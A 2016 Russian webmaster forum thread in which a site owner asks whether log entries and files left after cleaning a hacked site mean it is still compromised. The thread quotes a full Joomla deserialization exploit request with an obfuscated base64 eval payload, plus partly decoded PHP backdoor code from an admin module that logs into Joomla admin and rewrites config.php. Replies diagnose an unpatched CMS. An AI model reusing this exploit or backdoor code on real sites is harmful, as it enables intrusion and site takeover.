Остатки после чистки взломанного сайта

23

alegat2114

18 сентября 2016, 05:17

1308

Здравствуйте, сайт был взломан, была произведена чистка и замена кода. Гугл удалил свои предупреждения но в лог файлах сервера продолжают идти такие запросы:


46.119.115.28 - - [17/Sep/2016:17:32:19 +0300] "GET /stati/nemetskaya-akkuratnost-pri-vyravnivanii-polov/ HTTP/1.0" 301 287 "http://autoplate.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 297 550 0 1703

только по этой странице

и появляются такой декодированый base64 код




37.247.109.21 - - [18/Sep/2016:06:10:48 +0300] "GET / HTTP/1.0" 403 864 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:5855:\"eval(base64_decode(\"JGZpbGUxMTEgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtbG1LR2x6YzJWMEtDUmZSMFZVV3lKcmRYSmtJbDBwS1EwS0NYc05DZ2trYTNWeVpDQTlkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DZ2xwWmlBb0pHdDFjbVFwZXlCbFkyaHZJQ0pQYXlJN0lIMWxiSE5sZXlCbFkyaHZJQ0psY25KdmNpSTdJSDE5RFFvL1BnMEtQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmYUhSMGNDZ2tkWEpzS1hzTkNna2thVzBnUFNCamRYSnNYMmx1YVhRb0pIVnliQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDFKRlZGVlNUbFJTUVU1VFJrVlNMQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlEwOU9Ua1ZEVkZSSlRVVlBWVlFzSURFd0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFVGUmZSazlNVEU5WFRFOURRVlJKVDA0c0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlJUlVGRVJWSXNJREFwT3cwS0NYSmxkSFZ5YmlCamRYSnNYMlY0WldNb0pHbHRLVHNOQ2dsamRYSnNYMk5zYjNObEtDUnBiU2s3RFFwOURRb2tkR1Y0ZENBOUlHaDBkSEJmYUhSMGNDZ25hSFIwY0RvdkwzQmhjM1JsWW1sdUxtTnZiUzl5WVhjdmMybzVaekpPYmxrbktUc05DaVJ2Y0dWdVBXWnZjR1Z1S0NJdUxpOXNhV0p5WVhKcFpYTXZhbTl2Yld4aEwzTmxjM05wYjI0dmMyVnpjMmx2Ymk1d2FIQWlMQ0FpZHlJcE93MEtabmR5YVhSbEtDUnZjR1Z1TENBa2RHVjRkQ2s3RFFwbVkyeHZjMlVvSkc5d1pXNHBPdzBLUHo0TkNqdy9jR2h3RFFvTkNtVnljbTl5WDNKbGNHOXlkR2x1Wnlnd0tUc05DbVZqYUc4Z0luTmhjbUVpT3cwS1puVnVZM1JwYjI0Z1VtRnVaRzl0S0NSc1pXNW5kR2dnUFNBM0tTQjdEUW9nSUNBZ0pIQnBkQ0E5SUNkaFltTmtaV1puYUdscWEyeHRibTl3Y1hKemRIVjJkM2g1ZWljN0RRb2dJQ0FnSkhKaGJtUnpJRDBnSnljN0RRb2dJQ0FnWm05eUlDZ2thU0E5SURBN0lDUnBJRHdnSkd4bGJtZDBhRHNnSkdrckt5a2dldzBLSUNBZ0lDQWdJQ0FrY21GdVpITWdMajBnSkhCcGRGdHlZVzVrS0RBc0lITjBjbXhsYmlna2NHbDBLU0F0SURFcFhUc05DaUFnSUNCOURRb2dJQ0FnY21WMGRYSnVJQ1J5WVc1a2N6c05DbjBOQ2lSeVlXNGdQU0JTWVc1a2IyMG9LVHNOQ21WamFHOGdKenhoSUdoeVpYTmtaR1JtUFNJbkxpSWtjbUZ1SWk0bklqNG5PdzBLSkdacGJHVXhJRDBnSnp3L2NHaHdEUXBsY25KdmNsOXlaWEJ2Y25ScGJtY29NQ2s3RFFwcFppaHBjM05sZENna1gwZEZWRnNuTGlJa2NtRnVJaTRuWFNrcERRb0pldzBLQ1FsbFkyaHZJanhtYjI1MElHTnZiRzl5UFNOR1JrWkdSa1krVzNWdVlXMWxYU0l1Y0dod1gzVnVZVzFsS0NrdUlsc3ZkVzVoYldWZFBHSnlQaUk3RFFvSkNXVmphRzhnSWp4bWIyNTBJR052Ykc5eVBTTkdSa1pHUmtZK1czQjNaRjBpTG1kbGRHTjNaQ2dwTGlKYkwzQjNaRjA4WW5JK0lqc05DZ2tKY0hKcGJuUWdJbHh1SWpza1pHbHpZV0pzWlY5bWRXNWpkR2x2Ym5NZ1BTQkFhVzVwWDJkbGRDZ2laR2x6WVdKc1pWOW1kVzVqZEdsdmJuTWlLVHNnRFFvSkNXVmphRzhnSWtScGMyRmliR1ZRU0ZBOUlpNGtaR2x6WVdKc1pWOW1kVzVqZEdsdmJuTTdJSEJ5YVc1MElDSThZbkkrSWpzZ0RRb0pDV1ZqYUc4aVBHWnZjbTBnYldWMGFHOWtQWEJ2YzNRZ1pXNWpkSGx3WlQxdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaFBpSTdJQTBLQ1FsbFkyaHZJanhwYm5CMWRDQjBlWEJsUFdacGJHVWdibUZ0WlQxbVBqeHBibkIxZENCdVlXMWxQWFlnZEhsd1pUMXpkV0p0YVhRZ2FXUTlkaUIyWVd4MVpUMTFjRDQ4WW5JK0lqc2dEUW9KQ1NBZ2FXWW9KRjlRVDFOVVd5SjJJbDA5UFhWd0tRMEtleUJwWmloQVkyOXdlU2drWDBaSlRFVlRXeUptSWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2laaUpkV3lKdVlXMWxJbDBwS1h0bFkyaHZJanhpUG1KbGNtaGhjMmxzUEM5aVBpMHRQaUl1SkY5R1NVeEZVMXNpWmlKZFd5SnVZVzFsSWwwN2ZXVnNjMlY3WldOb2J5SThZajVuWVdkaGJDSTdmWDBnSUEwS2V5QnBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5SmxiV0ZrSWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2laVzFoWkNKZFd5SnVZVzFsSWwwcEtYdGxZMmh2SWp4aVBqd3ZZajR0TFQ0aUxpUmZSa2xNUlZOYkltVnRZV1FpWFZzaWJtRnRaU0pkTzMxbGJITmxlMlZqYUc4aVBHSStJanQ5ZlgwTkNqOCtKenNOQ2lSeVBXWnZjR1Z1S0NKaGNHbHpMbkJvY0NJc0lDSjNJaWs3SUdaM2NtbDBaU2drY2l3a1ptbHNaVEVwT3lCbVkyeHZjMlVvSkhJcE93MEtKSEk5Wm05d1pXNG9JaTR1TDJGd2FYTXVjR2h3SWl3Z0luY2lLVHNnWm5keWFYUmxLQ1J5TENSbWFXeGxNU2s3SUdaamJHOXpaU2drY2lrN0RRb2tjajFtYjNCbGJpZ2lMaTR2YVcxaFoyVnpMMkZ3YVhNdWNHaHdJaXdnSW5jaUtUc2dabmR5YVhSbEtDUnlMQ1JtYVd4bE1TazdJR1pqYkc5elpTZ2tjaWs3RFFva2NqMW1iM0JsYmlnaUxpNHZZbWx1TDJGd2FYTXVjR2h3SWl3Z0luY2lLVHNnWm5keWFYUmxLQ1J5TENSbWFXeGxNU2s3SUdaamJHOXpaU2drY2lrN0RRb2tjajFtYjNCbGJpZ2lMaTR2YVcxaFoyVnpMMmx1WkdWNExuQm9jQ0lzSUNKM0lpazdJR1ozY21sMFpTZ2tjaXdrWm1sc1pURXBPeUJtWTJ4dmMyVW9KSElwT3cwS0pHWnBiR1V4TVRFZ1BTQW5QR2gwYld3K0RRbzhhR1ZoWkQ0TkNqeDBhWFJzWlQ0TkNraGhRMnRsUkNCaWVTQk5kV2h0WVdSRmJXRmtEUW84TDNScGRHeGxQZzBLUEM5b1pXRmtQZzBLUEdKdlpIa2dZbWRqYjJ4dmNqMTNhR2wwWlQ0TkNqeGthWFlnYzNSNWJHVTlJblJsZUhRdFlXeHBaMjQ2SUdObGJuUmxjanNpUGp4bWIyNTBJSE5wZW1VOUlqWWlJR1poWTJVOUltTnZiV2xqSUhOaGJuTWdiWE1pUGp4aVBraGhRMnRsUkNCQ2VTQWdUWFZvYldGa1JXMWhaRHd2WWo0OEwyWnZiblErUEM5a2FYWStEUW84WkdsMklITjBlV3hsUFNKMFpYaDBMV0ZzYVdkdU9pQmpaVzUwWlhJN0lqNDhabTl1ZENCemFYcGxQU0kxSWlCbVlXTmxQU0pqYjIxcFl5QnpZVzV6SUcxeklqNDhZajQ4WW5JZ0x6NDhMMkkrUEM5bWIyNTBQand2WkdsMlBnMEtQR1JwZGlCemRIbHNaVDBpZEdWNGRDMWhiR2xuYmpvZ1kyVnVkR1Z5T3lJK1BHWnZiblFnYzJsNlpUMGlOU0lnWm1GalpUMGlZMjl0YVdNZ2MyRnVjeUJ0Y3lJK1BHSStURzl1WnlCTWFYWmxJSFJ2SUhCbGMyaHRZWEpuWVNBOFluSStQQzlpUGp3dlptOXVkRDQ4TDJScGRqNE5DanhrYVhZZ2MzUjViR1U5SW5SbGVIUXRZV3hwWjI0NklHTmxiblJsY2pzaVBqeGljaUF2UGp3dlpHbDJQZzBLUEhBK0RRbzhaR2wySUhOMGVXeGxQU0owWlhoMExXRnNhV2R1T2lCalpXNTBaWEk3SWo0OGFXMW5JSE55WXowaWFIUjBjRG92TDNwdmJtVm9iV2x5Y205eWN5NXZjbWN2WkdWbVlXTmxaQzh5TURFMUx6RXhMekUwTDJSbGJXbHNiM05wWjJoMGFXNW5jeTVqYjIwdmEzVnlaR2x6ZEdGdWRHOTFjaTV1WlhRdmRYQnNiMkZrY3k5emRHRjBhV056WDJsdFlXZGxMMnQxY21ScGMzUmhibDltYkdGblgzZGhkbWx1Wnk1bmFXWWlJSGRwWkhSb1BUSTFKU0JvYVdkb2REMHpOU1VnTHo0OEwyUnBkajROQ2p4a2FYWWdjM1I1YkdVOUluUmxlSFF0WVd4cFoyNDZJR05sYm5SbGNqc2lQanhpY2lBdlBqd3ZaR2wyUGcwS1BIQStEUW84WkdsMklITjBlV3hsUFNKMFpYaDBMV0ZzYVdkdU9pQmpaVzUwWlhJN0lqNDhabTl1ZENCemFYcGxQU0kxSWlCbVlXTmxQU0pqYjIxcFl5QnpZVzV6SUcxeklqNDhZajROQ2p4d1BnMEtTM1Z5UkdsemFDQklZVU5yTTNKVElGZGhVeUJJWlhKbERRbzhjRDQ4WW5JK0lHdDFjbVJzYVc1MWVEQXdOMEJuYldGcGJDNWpiMjBnUEdKeVBpQkdWVU5MSUVsVFNWTWdJU0FOQ2cwS0RRbzhMMkp2WkhrK0RRbzhMMmgwYld3K0RRb25PdzBLSkhJOVptOXdaVzRvSW1sdVpHVjRMbWgwYld3aUxDQWlkeUlwT3lCbWQzSnBkR1VvSkhJc0pHWnBiR1V4TVRFcE95Qm1ZMnh2YzJVb0pISXBPdzBLSkhJOVptOXdaVzRvSWk0dUwydHlaQzVvZEcxc0lpd2dJbmNpS1RzZ1puZHlhWFJsS0NSeUxDUm1hV3hsTVRFeEtUc2dabU5zYjNObEtDUnlLVHNOQ2lSeVBXWnZjR1Z1S0NJdUxpOXBiV0ZuWlhNdmEzSmtMbWgwYld3aUxDQWlkeUlwT3lCbWQzSnBkR1VvSkhJc0pHWnBiR1V4TVRFcE95Qm1ZMnh2YzJVb0pISXBPdzBLUHo0PScpOwokTXVobWFkZW1hZCA9IGRpcm5hbWUoX19GSUxFX18pOwokZmlsZSA9IGZvcGVuKCIkTXVobWFkZW1hZC90bXAva3JkLnBocCIgLCJ3KyIpOwpmd3JpdGUoJGZpbGUgLCRmaWxlMTExKTsKZmNsb3NlKCRmaWxlKTsKJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL2tyZC5waHAiIDsKJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOwpmd3JpdGUoJGZwLCRmaWxlMTExKTsKZmNsb3NlKCRmcCk7\"));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86" 6421 1125 0 114748

Помогите понять, что это за запросы и стоит ли опасаться что сайт еще взломан?

115

AGHost

18 сентября 2016, 06:22

#1

alegat2114, скорей всего осталась уязвимость в коде CMS. Ну или не весь вирусный код удалили. Попробуйте проверить ай-болитом, может он что-нибудь выдаст.

8 лет на рынке услуг хостинга - https://agho.st (https://agho.st)

364

pupseg

18 сентября 2016, 07:49

#2

я не программист, но в 99% случаев - дырка в CMS никуда не делась или используются заведомо дырявые плагины и модули. Попросите своего программиста обновить CMS до последней версии, вычистить неиспользуемые плагины и т д.

Качественная помощь в обслуживании серверов. (/ru/forum/661100) Бесплатных консультаций не даю, не помогаю, не обучаю. Минималка от 100$. Как пропатчить KDE-просьба не спрашивать. Есть форумы (http://linux.org.ru) и полезные сайты (http://www.opennet.ru/).

A2

23

alegat2114

18 сентября 2016, 08:40

#3

Сделал, пока обычную проверку ай болитом через виндовс.

Критические замечания

Эти файлы могут быть вредоносными или хакерскими скриптами (1)

C:\aibolit-for-windows\site/administrator/modules/mod_jino_spectrum_transfer/transfer.php


[x] 1…gfSBlbHNlIHsgc2V0X3N0YWdlKCdmaW5pc2gnKTsgZWNobyAnc3VjY2Vzcyc7IH0gZXhpdCgpOyB9"); eval("return eval(\"$code\");")?

большой файл с base64_decode


<?php $code=base64_decode("QGluaV9zZ...............yAnc3VjY2Vzcyc7IH0gZXhpdCgpOyB9"); eval("return eval(\"$code\");") ?>

расшифровал с помощью сервиса, покажу код .... весь код во вложении сообщения


@ini_set('opcache.enable', 0); @include('./config.php'); function set_config(\$_a63219c6e95a8a191598db8bad49, \$_d0896581e4843ea138d0aa09b681) { \$_39ea8675c15370f17364f774634f = dirname(__FILE__) . '/config.php'; \$_d2ba76ad9f81688224ca065ec19d = @file(\$_39ea8675c15370f17364f774634f); if (!\$_d2ba76ad9f81688224ca065ec19d) \$_d2ba76ad9f81688224ca065ec19d = array(\"<?php\\n\", \"?>\\n\"); \$_fe8e9a33830bf1edfaebd687fa3d = \"\"; \$_9a61b86ecef7f4f8978d90273acf = false; foreach (\$_d2ba76ad9f81688224ca065ec19d as \$_7c959818ed97cb2015fc59832df5) { if (strpos(\$_7c959818ed97cb2015fc59832df5, \$_a63219c6e95a8a191598db8bad49 . ' ') > -1) { \$_51c57b22 = \"\\t\$\" . \$_a63219c6e95a8a191598db8bad49 . ' = \"' . \$_d0896581e4843ea138d0aa09b681 . '\";'; if (strpos(\$_7c959818ed97cb2015fc59832df5, '<?php') > -1) \$_51c57b22 = '<?php ' . \$_51c57b22; if (strpos(\$_7c959818ed97cb2015fc59832df5, '?>') > -1) \$_51c57b22 .= '?>'; \$_7c959818ed97cb2015fc59832df5 = \$_51c57b22 . \"\\n\"; \$_9a61b86ecef7f4f8978d90273acf = true; } elseif (strpos(\$_7c959818ed97cb2015fc59832df5, '?>') > -1 and !\$_9a61b86ecef7f4f8978d90273acf) { \$_fe8e9a33830bf1edfaebd687fa3d .= \"\\t\$\" . \$_a63219c6e95a8a191598db8bad49 . ' = \"' . \$_d0896581e4843ea138d0aa09b681 . '\";' . \"\\n\"; } \$_fe8e9a33830bf1edfaebd687fa3d .= \$_7c959818ed97cb2015fc59832df5; } file_put_contents(\$_39ea8675c15370f17364f774634f, \$_fe8e9a33830bf1edfaebd687fa3d); } if (\$_REQUEST['module'] == 'new_key' and \$_REQUEST['username'] and \$_REQUEST['password']) { define('_JEXEC', 1); define('JPATH_BASE', realpath((dirname(__FILE__) . '/../../'))); require_once JPATH_BASE . '/includes/defines.php'; require_once JPATH_BASE . '/includes/framework.php'; \$_93d2a812f580fd8287ad85a0e029 = JFactory::getApplication('administrator'); \$_ad44e5c1a35c583d9483df1e1229 = \$_93d2a812f580fd8287ad85a0e029->login(array('username'=>\$_REQUEST['username'], 'password'=> \$_REQUEST['password'], 'secretkey'=>''), array('action'=>'core.login.admin')); if (!\$_ad44e5c1a35c583d9483df1e1229) { echo \"invalid password or login\"; exit(); } \$_78df129a = uniqid(); \$secret_key_crypt = md5(\$_78df129a); set_config('secret_key_crypt', \$secret_key_crypt); echo \$_78df129a; exit(); } if (!\$secret_key_crypt or \$secret_key_crypt == '__SECRETKEY__' or !isset(\$_REQUEST['key']) or md5(\$_REQUEST['key']) != \$secret_key_crypt) { echo \"invalid secret key\"; exit();

Может кто знает, это может быть код взлома? Я в этом сильно не понимаю?

А также, нашел "Подозрение на мобильный редирект, подмену расширений или автовнедрение кода (1)" в C:\aibolit-for-windows\site/.htaccess

Как он выглядит, и какие глобальные переменные использует? Кто знает?

ModX 1.0.6 -- где Помогите с вирусом WP Сайт просел на (-20)

136

P1otr

18 сентября 2016, 11:14

#4

Таких файлов в акаунте быть не должно. Уточните какая CMS используется

>>>>>>LinkBoss.net - Трастовые ссылки для увеличения трафика в 10 раз! (http://linkboss.net/)<<<<<<

Маркетинг для шоколадной фабрики. На 34% выше средний чек

Курс биткоина превысил $50 тысяч